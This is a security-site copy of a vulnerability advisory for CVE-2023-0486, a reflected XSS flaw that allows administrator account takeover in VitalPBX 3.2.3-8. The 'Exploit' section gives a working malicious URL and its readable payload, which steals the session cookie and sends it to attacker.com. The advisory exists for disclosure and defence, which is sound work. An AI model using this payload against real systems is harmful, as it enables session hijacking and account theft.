Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-0486: VitalPBX 3.2.3-8 - Account Takeover via Reflected XSS | Advisories | Fluid Attacks

VitalPBX version 3.2.3-8 allows an unauthenticated external attacker to obtain the instance’s administrator account via a malicious link. This is possible because the application is vulnerable to XSS.

CVE
Open in Source
#xss#vulnerability#linux#pdf#auth

Summary

Name

VitalPBX 3.2.3-8 - Account Takeover via Reflected XSS

Code name

Smith

Product

VitalPBX

Affected versions

3.2.3-8

State

Public

Release Date

2023-04-10

Vulnerability

Kind

Reflected cross-site scripting (XSS)

Rule

008. Reflected cross-site scripting (XSS)

Remote

Yes

CVSSv3 Vector

CVSS:AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSSv3 Base Score

8.8

Exploit available

No

CVE ID(s)

CVE-2023-0486

Description

VitalPBX version 3.2.3-8 allows an unauthenticated external attacker to obtain the instance’s administrator account via a malicious link. This is possible because the application is vulnerable to XSS.

Vulnerability

This vulnerability occurs because the application is vulnerable to XSS.

Exploit

To exploit this vulnerability, we just need to send a malicious url like the following to the administrator.

http://vulnerable.com/?class=<img+src=1+onerror='sid=document.cookie.split(`;`)[0].split(`=`)[1];fetch(`https://attacker.com/vitalpbx/leak?sid=`%2bsid);'>&method=exportCDR&mode=add&refresh_mode=&cdr_filter_id=&source=&destination=&from=2023-01-25%2000%3A00%3A00&to=2023-01-25%2023%3A59%3A59&cdr-report-dt_length=10&format=pdf

The payload, in a more readable format, looks like this.

sid=document.cookie.split(`;`)[0].split(`=`)[1];
fetch(`https://attacker.com/vitalpbx/leak?sid=`+sid);

Evidence of exploitation

Our security policy

We have reserved the ID CVE-2023-0486 to refer to this issue from now on.

  • https://fluidattacks.com/advisories/policy/

System Information

  • Version: VitalPBX 3.2.3-8

  • Operating System: GNU/Linux

Mitigation

There is currently no patch available for this vulnerability.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks’ Offensive Team.

References

Vendor page https://vitalpbx.com/

Timeline

2023-01-24

Vulnerability discovered.

2022-01-24

Vendor contacted.

2023-04-10

Public Disclosure.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE